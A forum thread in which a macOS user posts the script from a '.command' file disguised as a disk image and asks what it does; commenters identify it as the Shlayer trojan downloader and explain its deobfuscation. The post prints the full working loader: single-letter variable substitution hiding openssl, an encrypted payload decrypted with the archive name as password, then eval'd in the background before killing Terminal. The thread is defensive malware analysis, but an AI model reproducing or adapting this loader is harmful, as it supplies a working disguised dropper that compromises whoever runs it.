# Malware? Need help identifying

Tags: macos, malware

So very foolishly I opened a file without seeing the extension .command, and the file was disguised as a dmg, as in the file in the zip's icon was a dmg... Below are the contents of the script and I cannot, for the life of me, understand what it does... Can anyone help please? FYI, this is on macos

```
#!/bin/bash
G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX18IxSV6HXvYPgsz99KRREfIXHNGMvIOaDnLlDgldMtEjCU5rBZT0Hhb73bNx9ldy1GbpkDA0NbrbMuhVbw6GtQbreV6pIKjPSujA6SPaGMHT6pXRPejt91PAeLyEB0so+1YmmDeR2M4EKe6QaXfrsLuQP3lqOyO4lm/9MWaVf2YDD5zZ2upz5kN7/6/0pyQt4isz127jAc94vWcQj9MPm2oN6Hq+wvPevmJ/ybxvDzVP7GmWjBhAj9yMwEmMlbMR05FArhQpN9ZRc0wgcec6LhY0ujXAmmQoExTErcCZLz9aqkQxIGq3SrppaRf2f/uMPLgxUeSqNN/SSrIpy22Qf5s3rsCvm2dAGQc2Tyx0OCWELzieSbyAx9D3VCKpcONmmunyuj4YgkD3A=='
decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")"
nohup /bin/bash -c "${H}v${G}${V} \"$decryptedFommand\"" >/dev/null 2>&1 &
killall Terminal
```

Comment: Windows Defender identifies this as "TrojanDownloader:MacOS/Shlayer.D!MTB".

Comment: It's a heavily obscured installer, almost certainly for malware of some sort. Very similar to [this one](https://stackoverflow.com/questions/62005699/how-harmful-is-this-command), although the enclosed malware may be different.

Answer (score 0):

Can't identify that, but I can give you a hint where to start with analyzing...

You can take some obfuscating substitutions (e.g. `H="e"`) and apply them *just in your mind* - so you can easily see the script will try to `${H}v${G}${V}` (=`eval`) the decrypted `F`ommand (nice typo).

The command itself uses `${T}${J}${H}${X}${K}${K}${V}` (which obviously is `openssl`, with `${H}${X}${F}`=`enc`).

**Do not** be tempted to execute this script (e.g. after just inserting `echo`/`exit` lines). Just decode the commands and arguments by yourself, like shown above, then understand them well enough with the pertaining `man` pages, and only *then* ponder if it's safe enough to do these steps by hand to unwrap the next layer.

Now, the next step would be to copy the `commandArgs` string to a new place, and to try to apply `openssl` (with the correct arguments) to obtain the command to be `eval`d.

Comment: It looks like `commandArgs` is an encrypted payload and the obfuscated openssl code is decrypting it ready to be `eval`ed. Tha password appears to be generated by the previous set of messy exports and from what I can see is the final result in `archive`.